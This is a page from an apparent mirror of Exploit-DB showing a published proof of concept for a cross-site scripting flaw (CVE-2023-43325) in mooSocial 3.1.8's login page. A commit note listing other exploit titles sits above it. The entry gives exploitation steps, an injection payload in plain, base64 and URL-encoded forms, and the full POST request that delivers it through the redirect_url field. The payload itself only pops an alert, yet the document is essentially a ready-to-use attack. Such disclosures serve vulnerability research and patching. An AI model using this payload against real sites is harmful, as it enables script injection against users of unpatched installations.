bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51766.txt
Exploit-DB 81ae91fdae DB: 2024-02-03 
14 changes to exploits/shellcodes/ghdb

Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure
Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure
Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution
Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal
TP-LINK TL-WR740N - Multiple HTML Injection
TP-Link TL-WR740N - UnAuthenticated Directory Transversal

Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)

mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page

PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow

WebCatalog 48.4 - Arbitrary Protocol Execution
2024-02-03 00:16:34 +00:00

31 lines
No EOL
1.2 KiB
Text
Raw Blame History

# Exploit Title: mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page
# Date: 26 September 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://moosocial.com
# Software Link: https://travel.moosocial.com/
# Version: 3.1.8
# Tested on: Windows 11
# CVE : CVE-2023-43325
Description:
A Cross Site Scripting (XSS) vulnerability exists on the user login page in mooSocial which is a social network website.
Steps to exploit:
1) Go to Login page on the website and login with credentials.
2) Insert your payload in the "data[redirect_url]" - POST Request
Proof of concept (Poc):
The following payload will allow you to execute XSS -
Payload (Plain text):
test"><img src=a onerror=alert(1)>test
Payload (Base64 encoded) :
dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded):
dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d
POST Request on /moosocial/users/login (POST REQUEST DATA ONLY):
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]
Reference in a new issue View git blame Copy permalink